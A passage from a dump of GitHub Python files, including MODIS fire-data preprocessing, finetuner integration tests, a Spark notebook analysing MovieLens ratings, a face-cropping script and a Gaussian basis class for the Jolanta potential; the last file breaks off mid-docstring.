","repo_name":"tanmaya-arora/RWA_Management","sub_path":"reporting/views/stock_views.py","file_name":"stock_views.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37590511159","text":"from modis_data_download import countries, getmodis3\nfrom modis_data_prep import process_date\nfrom modis_concatenate import combine_csv\n\n\n'''Check if directory exists, if not, create it'''\nimport os\n\nfor country in countries:\n\n # You should check in your preferred folder.\n MYDIR = ('D:/Mitch/Repos/Streamlit/measuring_carbon/test/Modis_Fires/modis_firms' + country)\n CHECK_FOLDER = os.path.isdir(MYDIR)\n\n # If folder doesn't exist, then create it.\n if not CHECK_FOLDER:\n os.makedirs(MYDIR)\n # print(\"created folder : \", MYDIR)\n # change working directory to folder\n os.chdir(MYDIR) \n # scrape & download the files\n getmodis3(country,range(2015,2022))\n # preprocess country files\n modis_2015 = process_date(r'modis_2015_'+ country +'.csv')\n modis_2016 = process_date(r'modis_2016_'+ country +'.csv')\n modis_2017 = process_date(r'modis_2017_'+ country +'.csv')\n modis_2018 = process_date(r'modis_2018_'+ country +'.csv')\n modis_2019 = process_date(r'modis_2019_'+ country +'.csv')\n modis_2020 = process_date(r'modis_2020_'+ country +'.csv')\n modis_2021 = process_date(r'modis_2021_'+ country +'.csv')\n\n modis_2015.to_csv('modis_2015_' + country + '.csv', index = False)\n modis_2016.to_csv('modis_2016_' + country + '.csv', index = False)\n modis_2017.to_csv('modis_2017_' + country + '.csv', index = False)\n modis_2018.to_csv('modis_2018_' + country + '.csv', index = False)\n modis_2019.to_csv('modis_2019_' + country + '.csv', index = False)\n modis_2020.to_csv('modis_2020_' + country + '.csv', index = False)\n modis_2021.to_csv('modis_2021_' + country + '.csv', index = False)\n print(f\"{country} preprocessing done \")\n # concatenate\n #export to csv\n combined_csv = combine_csv()\n combined_csv.to_csv(country + \".csv\", index=False, encoding='utf-8-sig')\n print(f\"{country} concatenated\")\n\n \n# else:\n # print(MYDIR, \"folder already exists.\")\n","repo_name":"Mitchell-Odili/Modis_Fires","sub_path":"code/modis_multiple_files_preparation.py","file_name":"modis_multiple_files_preparation.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"181539350","text":"\nclass ViewRequiredException(Exception):\n \"\"\"\n Raised when a frame is required but not found.\n \"\"\"\n def __init__(self, message=None):\n if not message:\n message = \"No frames have been registered.\"\n super().__init__(message)\n\n\nclass UnfiApiClientNotSetException(Exception):\n \"\"\"\n Raised when a client is required but not found.\n \"\"\"\n def __init__(self, message=None):\n if not message:\n message = \"UnfiApiClient is required but not found.\"\n \n super().__init__(message)","repo_name":"sonicdm/myunfi_api","sub_path":"UNFI File Search/unfi_gui/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"16585646158","text":"import os\n\nimport numpy as np\nimport pytest\nfrom docarray import DocumentArray\nfrom tests.helper import create_random_name\n\nimport finetuner\nfrom finetuner.constants import FAILED, FINISHED, STATUS\nfrom finetuner.model import synthesis_model_en\n\n\ndef test_runs(finetuner_mocker, get_feature_data):\n experiment_name = create_random_name()\n\n # get preprocessed data\n train_data, eval_data = get_feature_data\n\n # create an experiment and retrieve it\n finetuner_mocker.create_experiment(experiment_name)\n experiment = finetuner_mocker.get_experiment(name=experiment_name)\n assert experiment.name == experiment_name\n assert experiment.status == 'ACTIVE'\n\n # Create Runs\n first_run, second_run = [create_random_name(prefix='run') for _ in range(2)]\n\n # create a first run\n finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_data,\n eval_data=eval_data,\n experiment_name=experiment_name,\n run_name=first_run,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=1e-3,\n batch_size=12,\n epochs=2,\n device='cpu',\n )\n\n # get the first run\n run = finetuner_mocker.get_run(experiment_name=experiment_name, run_name=first_run)\n assert run.name == first_run\n\n # create another run\n finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_data,\n eval_data=eval_data,\n experiment_name=experiment_name,\n run_name=second_run,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=1e-3,\n batch_size=12,\n epochs=1,\n device='cpu',\n )\n\n # list all runs\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert len(runs) == 2\n run_names = [run.name for run in runs]\n assert first_run in run_names and second_run in run_names\n\n # delete the first run\n finetuner_mocker.delete_run(experiment_name=experiment_name, run_name=first_run)\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert len(runs) == 1\n\n # delete all existing runs\n finetuner_mocker.delete_runs(experiment_name=experiment_name)\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert not runs\n\n # delete experiment\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n\n\n@pytest.mark.parametrize('use_onnx', [True, False])\ndef test_create_training_run_and_save_model(\n finetuner_mocker, get_feature_data, tmp_path, use_onnx\n):\n import time\n\n train_da, test_da = get_feature_data\n experiment_name = create_random_name()\n finetuner_mocker.create_experiment(name=experiment_name)\n run = finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_da,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=0.001,\n batch_size=12,\n epochs=2,\n experiment_name=experiment_name,\n to_onnx=use_onnx,\n device='cpu',\n )\n status = run.status()[STATUS]\n\n # wait for up to 20 minutes for the run to finish\n for _ in range(6 * 20):\n if status in [FAILED, FINISHED]:\n break\n time.sleep(10)\n status = run.status()[STATUS]\n\n assert status == FINISHED\n\n artifact_id = run.artifact_id\n assert isinstance(artifact_id, str)\n # the artifact id is a 24 character hex string defined in mongo db.\n assert len(artifact_id) == 24\n\n artifact = run.save_artifact(directory=tmp_path / 'finetuned_model')\n assert os.path.exists(tmp_path / 'finetuned_model')\n\n # encode and check the embeddings\n model = finetuner.get_model(artifact=artifact, is_onnx=use_onnx)\n finetuner.encode(model=model, data=test_da)\n assert test_da.embeddings is not None\n assert isinstance(test_da.embeddings, np.ndarray)\n\n # delete created experiments (and runs)\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n\n\ndef test_create_synthesis_run_and_save_data(\n finetuner_mocker, synthesis_query_data, synthesis_corpus_data\n):\n import time\n\n experiment_name = create_random_name()\n finetuner_mocker.create_experiment(name=experiment_name)\n run = finetuner_mocker.create_synthesis_run(\n query_data=synthesis_query_data,\n corpus_data=synthesis_corpus_data,\n models=synthesis_model_en,\n num_relations=3,\n experiment_name=experiment_name,\n )\n status = run.status()[STATUS]\n\n # wait for up to 20 minutes for the run to finish\n for _ in range(6 * 20):\n if status in [FAILED, FINISHED]:\n break\n time.sleep(10)\n status = run.status()[STATUS]\n\n assert status == FINISHED\n\n train_data = run.train_data\n assert isinstance(train_data, str)\n train_data = DocumentArray.pull(train_data)\n\n for doc in train_data['@c']:\n assert doc.content is not None\n\n # delete created experiments (and runs)\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n","repo_name":"jina-ai/finetuner","sub_path":"tests/integration/test_runs.py","file_name":"test_runs.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":1320,"dataset":"github-code","pt":"73"} +{"seq_id":"30398145180","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# %load data.py\nfrom __future__ import print_function, division\n\nimport csv\nimport functools\nimport json\nimport os\nimport random\nimport warnings\n\nimport numpy as np\nimport torch\n#from pymatgen.core.structure import Structure\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.autograd import Variable\n\n\ndef CGCNNdata(Dataset, normalizer, model): \n #atom_tablenum=[]\n #pre_out=[]\n #cif_ids=[]\n #atom_bond=[]\n #atom_num=[]\n #target_vol=[]\n cgcnn_dataset=[]\n for i, (input, target, batch_cif_ids, atom_table_num) in enumerate(Dataset):\n vol_out=[]\n with torch.no_grad():\n input_var = (Variable(input[0]),\n Variable(input[1]),\n input[2],\n input[3])\n #atom_bond.append(input[2])\n #atom_num.append(input[3])\n target_normed = normalizer.norm(target)\n with torch.no_grad():\n target_var = Variable(target_normed)\n\n output=model(*input_var)\n\n #local_voltage=LocalEnergy(output[1][1])\n\n vol_out.append(output)\n vol_out.append(input[2])\n vol_out.append(input[3])\n vol_out.append(torch.reshape(atom_table_num, [-1]))\n vol_out.append(batch_cif_ids)\n vol_out.append(target[0])\n cgcnn_dataset.append(vol_out)\n #atom_tablenum.append(torch.reshape(atom_table_num, [-1]))\n #cif_ids.append(batch_cif_ids)\n #target_vol.append(target)\n\n '''\n pre_out[0] the predicted voltage values.\n pre_out[1] the output of every layer\n pre_out[1][0] embedding\n pre_out[1][1] conv\n pre_out[1][2] pooling\n pre_out[1][3] hidden layer\n '''\n return cgcnn_dataset #pre_out, atom_tablenum, cif_ids, atom_bond, atom_num, target_vol\n\ndef collate_pool_local(dataset_list):\n \"\"\"\n Collate a list of data and return a batch for predicting crystal\n properties.\n pre_out, atom_tablenum, cif_ids, atom_bond, atom_num, target_vol\n \"\"\"\n batch_nbr_fea= []\n \n bond_atom_incrystal, batch_atom_table_num =[], []\n batch_nbr_fea_idx, crystal_atom_idx=[], []\n batch_cif_ids=[]\n batch_target=[] \n\n base_idx = 0\n\n for i, data_sample in enumerate(dataset_list):\n \n pre_out=data_sample[0]\n nbr_fea=pre_out[1][1]\n batch_nbr_fea.append(nbr_fea)\n \n n_i = nbr_fea.shape[0]\n batch_nbr_fea_idx.append(data_sample[1]+base_idx)\n #crystal_atom_idx.append(data_sample[2]+base_idx)\n new_idx = torch.LongTensor(np.arange(n_i)+base_idx)\n crystal_atom_idx.append(new_idx)\n base_idx += n_i\n \n batch_atom_table_num.append(data_sample[3])\n batch_cif_ids.append(data_sample[4])\n batch_target.append(data_sample[5])\n \n \n \n return (torch.cat(batch_nbr_fea, dim=0),\n torch.cat(batch_nbr_fea_idx, dim=0),\n crystal_atom_idx),\\\n torch.stack(batch_target, dim=0),\\\n batch_cif_ids,\\\n torch.cat(batch_atom_table_num, dim=0)","repo_name":"mpeshel/Interpretable_AI_for_battery","sub_path":"CGCNN_visulization/data_local_vol.py","file_name":"data_local_vol.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"21802433097","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ## MovieLens Data analysis \n# MAGIC \n# MAGIC For this notebook, we will be using a MovieLens sample dataset. The data includes 100,000 ratings and 3,600 tag applications applied to 9,000 movies by 600 users and can be found in https://grouplens.org/datasets/movielens/latest/\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC First, we import the libraries that we are going to use for the data visualization. Then we load the data we just downloades from the MovieLens website. The files were uploaded to an S3 bucket and loaded from there. \n\n# COMMAND ----------\n\nlinks = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/links.csv\")\nmovies = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/movies.csv\")\nratings = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/ratings.csv\")\ntags = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/tags.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Once the data is loaded, we take a look at them by using the show action is spark. \n\n# COMMAND ----------\n\nlinks.show()\n\n# COMMAND ----------\n\nmovies.show()\n\n# COMMAND ----------\n\nratings.show()\n\n# COMMAND ----------\n\ntags.show()\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC As we cans ee in the table previews, the year of the movie is embeded in the movie title. In order to extract this information, I created a User Defined Function(UDF) that takes the year when available, otherwise it returns null. \n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import udf\nimport pyspark.sql.functions as F\n\ndef get_year(title):\n try:\n return(int(title[-5:-1]))\n except:\n return(None)\n\n\nget_year_udf = udf(get_year)\n\n# COMMAND ----------\n\nmovies = movies.withColumn(\"year\", get_year_udf(movies.title))\nmovies.show()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC As part of the analysis of this dataset, it would be useful to have the average rating for each movie. In the following cell of code, I aggregate over the ratings table to get the average rating for each movie ID. \n\n# COMMAND ----------\n\nfrom pyspark.sql.types import FloatType\nfrom pyspark.sql.functions import bround\nfrom pyspark.sql.functions import mean\n\nratings_agg = ratings.groupBy(\"movieId\").agg(mean(\"rating\").alias(\"avg_rating\"))\nratings_agg = ratings_agg.withColumn(\"average_rating\", ratings_agg.avg_rating.cast(FloatType())).drop(\"avg_rating\").withColumnRenamed(\"average_rating\", \"avg_rating\")\nratings_agg = ratings_agg.select(\"movieId\",bround(\"avg_rating\",2).alias(\"avg_rating\"))\nratings_agg.show()\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Here we evaluate the average rating by year to identify if there is a trend in the ratings either to decrease or increase over the years. Visually, it is not possible to appreaciate such trend, but it was possible to identify some outlayer values in the year column. \n# MAGIC \n# MAGIC To achieve this, it was necessary to join the aggregated ratings table with movies table that includes the year as a column. \n\n# COMMAND ----------\n\njoined_movies = movies.join(ratings_agg,\"movieId\")\njoined_movies.select(\"year\",'avg_rating').groupBy(\"year\").mean().orderBy(\"year\").display()\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC As mentioned before, the year column contains some outlayers and null values. Thus, here I aggregate the data counting the number of movies by year. By doing this, we can see that there are some movies with years from the early 1900s. \n\n# COMMAND ----------\n\njoined_movies.select(\"year\",'avg_rating').groupBy(\"year\").count().orderBy(\"year\").display()\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import split,explode\n\nexploded_movies = movies.withColumn(\"genres\", explode(split(\"genres\",\"[|]\")))\nexploded_movies.groupBy(\"genres\").count().display()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC Something worthy to analyze is to check wether the voters have a bias on a particular genre. This could be tested by taking the average rating by genre and see whether the rating distribution is uniform, that is, that there is no systematic bias towards a particular genre. \n\n# COMMAND ----------\n\nrated_genres = exploded_movies.join(ratings,\"movieId\").select(\"genres\",\"rating\")\nrated_genres.groupBy(\"genres\").mean().display()\n\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC By doing a visual analysis, it seems that the people rating the movies has no bias towards a particular genre. The distribution looks quite uniform, even though the sample is small. \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Let's now proceed to see which movies are the ones with the best score and those ones with the worst score. For this purpose, I will take the top 10 elements from the joined table that includes the movie title and the average rating. \n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import desc\njoined_movies.select(\"title\",\"avg_rating\").orderBy(desc(\"avg_rating\")).head(10)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC Now I take the 10 movies with the lowest average rating to see the worst movies in our dataset. \n\n# COMMAND ----------\n\njoined_movies.select(\"title\",\"avg_rating\").orderBy(\"avg_rating\").head(10)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Exportind the processed dataframes as parquet files to the S3 bucket we used to read the files. As a further step, I will be connecting this tables to AWS Redshift for their analysis. \n\n# COMMAND ----------\n\njoined_movies.write.format(\"parquet\").mode(\"Overwrite\").option(\"path\",\"s3a://filestoragedatabricks/MovieLensData/joined_df\").save()\n\n# COMMAND ----------\n\n\nexploded_movies.write.format(\"parquet\").mode(\"Overwrite\").option(\"path\",\"s3a://filestoragedatabricks/MovieLensData/exploded_df\").save()\n\n# COMMAND ----------\n\nprint(\"hello git\")","repo_name":"MontufarEric/DatabricksRepo","sub_path":"notebooks/Users/eric.montufar@gmail.com/python_code/MovieLens_data.py","file_name":"MovieLens_data.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"13149249091","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass HitCount(models.Model):\n created = models.DateTimeField(_('Created'), auto_now_add=True, editable=False)\n modified = models.DateTimeField(_('Modified'), auto_now=True, editable=False)\n url = models.CharField(_('URL'), max_length=2000)\n hits = models.PositiveIntegerField(_('Hits'), default=0)\n\n class Meta:\n ordering = ('-created', '-modified')\n get_latest_by = 'created'\n","repo_name":"renyi/django-pageviews","sub_path":"pageviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"73"} +{"seq_id":"38932536013","text":"import time\nimport cx_Oracle\nimport pyexifinfo #exiftool\nfrom PIL import Image, ImageDraw\nfrom os.path import exists\nfrom os import makedirs\nimport pyexifinfo as p\n\np.ver() #retrieve your ExifTool version\nfilename = 'Astraat.jpg'\nprint(p.get_json(filename)) #retrieve a json representation of this file exif\nexit()\nglobal_start_time = time.time()\n\ncounter = 0\nimagePath = \"\"\npath = \"\"\n\nconnection = cx_Oracle.connect('python/python@127.0.0.1/xe')\ncursor = connection.cursor()\n\ncursor.execute(\"SELECT face_id, path, name, left, top, right, bottom, filetypeextension FROM faces, images WHERE image_id = image ORDER BY path, name\")\n\nwith pyexifinfo.ExifTool() as et:\n # metadata = et.get_metadata(imagePath)\n faces = cursor.fetchall()\n corpusSize = str(cursor.rowcount)\n for face in faces:\n if path != face[1]:\n path = face[1]\n if not exists(\"Rendered/\" + path[27:]):\n makedirs(\"Rendered/\" + path[27:])\n if imagePath != face[1] + \"/\" + face[2]:\n imagePath = face[1] + \"/\" + face[2]\n img = Image.open(imagePath)\n metadata = et.get_metadata(imagePath)\n if \"EXIF:Orientation\" in metadata:\n if metadata[\"EXIF:Orientation\"] == 3:\n img = img.rotate(180, expand=True)\n elif metadata[\"EXIF:Orientation\"] == 6:\n img = img.rotate(270, expand=True)\n elif metadata[\"EXIF:Orientation\"] == 8:\n img = img.rotate(90, expand=True)\n counter += 1\n print(\"\\r\" + str(counter) + \" of \" + corpusSize + \": \" + imagePath + \" \",)\n img.crop((face[3], face[4], face[5], face[6])).save(\"Rendered/\" + path[27:] + \"/\" + face[0] + \".\" + face[7])\n\ncursor.close()\nconnection.close()\n\nprint(\"\\n\\nTotal execution time: \" + str(round(time.time() - global_start_time)) + \" seconds\")\n","repo_name":"khoubeibouthour/Weighted-Cross-Matching","sub_path":"faces.py","file_name":"faces.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39408493935","text":"map = []\ncounter = 0\ntree_count = 0\nfirst = True\nwith open('input.txt') as input:\n for i in input.readlines():\n map.append(i.rstrip()*len(i*2))\n\nfor line in map:\n if first == True:\n first = False\n continue\n counter += 3\n if line[counter] == \"#\":\n tree_count += 1\n if counter + 6 > len(line):\n print(tree_count)\n quit()\n\nprint(tree_count)","repo_name":"Zolor/adventofcode2020","sub_path":"day03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74907924076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 08:54:27 2021\n\n@author: Thomas Sommerfeld\n\"\"\"\n\n\"\"\"\nA class to manage a Gaussian basis for the Jolanta potential with l=1\n\nLots of helper functions not in the class to keep the legacy notebooks working.\n\"\"\"\n\nimport numpy as np\nimport scipy.special\nfrom scipy.linalg import eigh\n\n\nclass GBR:\n\n def __init__(self, alphas, param, contract=(0, 0), diffuse=(0, 1.4)):\n \"\"\"\n alphas: exponents alphas\n aparam: Jolanta-3D parameters (a,b,c)\n contract(nc, nu): \n uses the lowest nc eigenvectors of H (only nc==1 makes sense)\n and adds nu uncontracted GTOs starting from the smallest alpha\n diffuse(n_diff, scale):\n after contraction, add n_diff even-tempered diffuse functions\n alphas[-1]/s, alphas[-1]/s**2, ... \n \"\"\"\n\n self.n_val = len(alphas)\n self.n_diff, scale = diffuse\n self.param = param\n self.nc, self.nu = contract\n \n self.alphas = np.zeros(self.n_val + self.n_diff)\n self.alphas[:self.n_val] = np.sort(alphas)[::-1]\n for j in range(self.n_diff):\n self.alphas[self.n_val+j] = self.alphas[self.n_val+j-1]/scale\n\n self.Ns = np.zeros(self.n_val + self.n_diff) \n for j, a in enumerate(self.alphas):\n self.Ns[j] = Jolanta_3D_PNorm(a)\n\n \"\"\" uncontracted S, T, and V_Jolanta \"\"\"\n self.Sun, self.Tun, self.Vun = Jolanta_GTO_H(self.alphas, self.Ns, self.param)\n\n \"\"\" contraction matrix C with shape (n_primitive, n)contracted) \"\"\"\n self.C = 0\n if self.nc == 0:\n \"\"\" no contraction = all basis function \"\"\"\n self.S, self.T, self.V = self.Sun, self.Tun, self.Vun\n return\n \"\"\" else: contract with valence eigenstates \"\"\"\n nv = self.n_val\n Sval, Tval, Vval = self.Sun[:nv,:nv], self.Tun[:nv,:nv], self.Vun[:nv,:nv]\n Es, cs = eigh(Tval + Vval, b=Sval)\n n_prim = self.n_val + self.n_diff\n n_cont = self.nc + self.nu + self.n_diff\n self.C = np.zeros((n_prim, n_cont))\n self.C[:nv,:self.nc] = cs[:,:self.nc]\n for j in range(n_cont - self.nc):\n self.C[-1-j,-1-j] = 1.0\n \n self.S = np.linalg.multi_dot([self.C.T, self.Sun, self.C])\n self.T = np.linalg.multi_dot([self.C.T, self.Tun, self.C])\n self.V = np.linalg.multi_dot([self.C.T, self.Vun, self.C])\n\n\n def exponents(self):\n return self.alphas\n \n def normalization_constants(self):\n return self.Ns\n \n def print_exp(self):\n print(\" alpha r0=1/sqrt(alpha) Norm\")\n for j, a in enumerate(self.alphas):\n print(f\" {a:15.8e} {np.sqrt(1/a):15.8e} {self.Ns[j]:11.4e}\")\n\n def contraction_matrix(self):\n return self.C\n\n def STV(self):\n return self.S, self.T, self.V\n \n def V_jolanta(self, params):\n \"\"\" \n returns the Jolanta(l=1) potential with different parameters \n does not change self.V\n \"\"\"\n Sun, Tun, Vun = Jolanta_GTO_H(self.alphas, self.Ns, params)\n if self.nc == 0:\n return Vun\n else:\n return np.linalg.multi_dot([self.C.T, Vun, self.C])\n\n \n def H_theta(self, theta, alpha):\n \"\"\" \n theta: scaling angle for the radial coordinate r: exp(i*theta) \n returns: the complex scaled Hamiltonian H(r*exp(i*theta))\n \"\"\"\n z = alpha*np.exp(1j*theta)\n f = z**(-2)\n Vun_rot = Jolanta_GTO_VJrot(self.alphas, self.Ns, self.param, z)\n Hun_rot = f*self.Tun + Vun_rot\n if self.nc == 0:\n return Hun_rot\n else:\n return np.linalg.multi_dot([self.C.T, Hun_rot, self.C])\n \n def Wcap(self, rc):\n \"\"\" real matrix W for the CAP, where W(r 0:\n c_un = np.matmul(self.C, cs)\n return Eval_GTO_wf_3D(self.alphas, self.Ns, c_un, rs, u)\n else:\n return Eval_GTO_wf_3D(self.alphas, self.Ns, cs, rs, u)\n\n\n\ndef Jolanta_3D_PNorm(a):\n \"\"\"\n see Analytic integrals notebook in Stab directory for formulas\n integrals of two GTOs: r*exp(-a_j*r**2) dV = r**2 dr\n return the normalization 1/sqrt(S_jj)\n R is a p-fn, u is a D-fn: \n 4 * 2**(3/4) * sqrt(3) * a1**(5/4) / (3*pi**(1/4))\n \"\"\"\n return 4 * 2**(3/4) * np.sqrt(3) * a**(5/4) / (3*np.pi**(1/4))\n\n\ndef Jolanta_3D_GTO(a1, a2, param):\n \"\"\"\n see Analytic integrals notebook in GTO directory for formulas\n integrals of two GTOs: x*exp(-a_j*x**2)\n computes overlap, kinetic energy, and potential\n R1 and R2 are p-fns, u1 and u2 are D-fns:\n the parameter l is ignored (so that 1D and 3D may call the same fn)\n \"\"\"\n a, b, c = param\n sqrt_pi = np.sqrt(np.pi)\n S = 3 * sqrt_pi / (8*(a1 + a2)**2.5)\n T = sqrt_pi * (1.875*a1*a2 - 0.25*(a1 + a2)**2)/(a1 + a2)**3.5 \n VJ = 3 * sqrt_pi * (5*a - 2*a1*b - 2*a2*b - 2*b*c)/(16*(a1 + a2 + c)**3.5)\n VL = sqrt_pi / (4*(a1 + a2)**1.5)\n return S, T, VJ+VL\n\n\ndef Jolanta_GTO_H(alphas, Ns, param):\n \"\"\"\n Hamiltonian matrix in the uncontracted GTO basis set\n \n Parameters\n ----------\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n param : (a, b, c): parameters of the Jolanta potential\n\n Returns 3 numpy matrices\n -------\n S : overlap matrix\n T : kinetic energy matrix\n V : potential energy matrix\n\n \"\"\"\n nbas = len(alphas)\n S=np.zeros((nbas,nbas))\n T=np.zeros((nbas,nbas))\n V=np.zeros((nbas,nbas))\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n S[i,i], T[i,i], V[i,i] = Jolanta_3D_GTO(ai, ai, param)\n S[i,i] *= Ni*Ni\n T[i,i] *= Ni*Ni\n V[i,i] *= Ni*Ni\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n Sij, Tij, Vij = Jolanta_3D_GTO(ai, aj, param)\n S[i,j] = S[j,i] = Ni*Nj * Sij\n T[i,j] = T[j,i] = Ni*Nj * Tij\n V[i,j] = V[j,i] = Ni*Nj * Vij\n return S, T, V\n\n\n\n\ndef Jolanta_3D_CS(a12, param, z):\n \"\"\"\n computes int dr r**4 * exp(-ag*r**2) * (VJ + Vl)\n VJ = (a*r**2 - b)*exp(-c*r**2) = Va - Vb \n Vl = 1/r**2\n for r -> r*exp(i*theta)\n\n this is for a radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n z = alpha*exp(I*theta)\n both Va and Vb are valid only for 2*theta <= pi/2\n no problem as the max rotation angle is pi/4\n\n\n VJ(z*r) = (3*sqrt(pi)*(5*a*z**2 - 2*b*(a12 + c*z**2))\n /(16*(a12 + c*z**2)**(7/2)) \n \"\"\"\n a, b, c = param\n sp = np.sqrt(np.pi)\n f = z**2\n #Va = 15*sp*a*f / (16*(a12 + c*f)**(7/2))\n #Vb = 3*sp*b / (8*(a12 + c*f)**(5/2)) \n VJ = ( 3*sp * (5*a*f - 2*b*(a12 + c*f))\n / (16*(a12 + c*f)**3.5) )\n VL = sp / (4*(a12)**1.5) / f\n return VJ + VL\n\n\ndef Jolanta_3D_Wcap(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * w(r)\n w(r) = (r-rc)**2 for x > rc; else 0\n\n this is for CAP radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n - rc*exp(-a*rc**2)/(8*a**3) \n - 3*sqrt(pi)*rc**2*erf(sqrt(a)*rc)/(8*a**(5/2)) \n + 3*sqrt(pi)*rc**2/(8*a**(5/2)) \n - 15*sqrt(pi)*erf(sqrt(a)*rc)/(16*a**(7/2)) \n + 15*sqrt(pi)/(16*a**(7/2))\n\n W = (- rc*exa/(8*a**3)\n - 3*sp*rc**2 * erf / (8*a**(5/2)) \n + 3*sp*rc**2 / (8*a**(5/2)) \n - 15*sp * erf / (16*a**(7/2)) \n + 15*sp / (16*a**(7/2))\n )\n\n W = (- rc*exa / (8*a**3)\n + 3*sp*rc**2 / (8*a**(5/2)) * (1 - erf) \n + 15*sp / (16*a**(7/2)) * (1 - erf)\n )\n\n \"\"\"\n sp = np.sqrt(np.pi)\n exa = np.exp(-a*rc**2)\n erf = scipy.special.erf(rc*np.sqrt(a))\n\n W = (- rc*exa / (8*a**3)\n + 3*sp*rc**2 / (8*a**(5/2)) * (1 - erf) \n + 15*sp / (16*a**(7/2)) * (1 - erf)\n )\n\n return W\n\n\ndef Jolanta_3D_Coulomb(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * (-1/r)\n\n this is for RAC radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n \n rc is ignored (needed for function uniformity)\n \n returns -1/(2*a**2)\n \"\"\"\n return -1/(2*a**2)\n\n\ndef Jolanta_3D_softbox(a, rc):\n \"\"\"\n computes int_rc^oo dr r**4 * exp(-a*r**2) * w(r)\n w(r) = exp(-4*rc**2/x**2) - 1\n\n this is for RAC radial p-GTO: u(r) = R(r)*r\n u1*u2 = r**4 * exp(-(a1+a2)*r**2)\n\n + 3*sqrt(pi)*rc*cosh(4*sqrt(a)*rc)/(2*a**2) \n - 3*sqrt(pi)*rc*sinh(4*sqrt(a)*rc)/(2*a**2) \n + 2*sqrt(pi)*rc**2*cosh(4*sqrt(a)*rc)/a**(3/2) \n - 2*sqrt(pi)*rc**2*sinh(4*sqrt(a)*rc)/a**(3/2) \n + 3*sqrt(pi)*cosh(4*sqrt(a)*rc)/(8*a**(5/2)) \n - 3*sqrt(pi)*sinh(4*sqrt(a)*rc)/(8*a**(5/2)) \n - 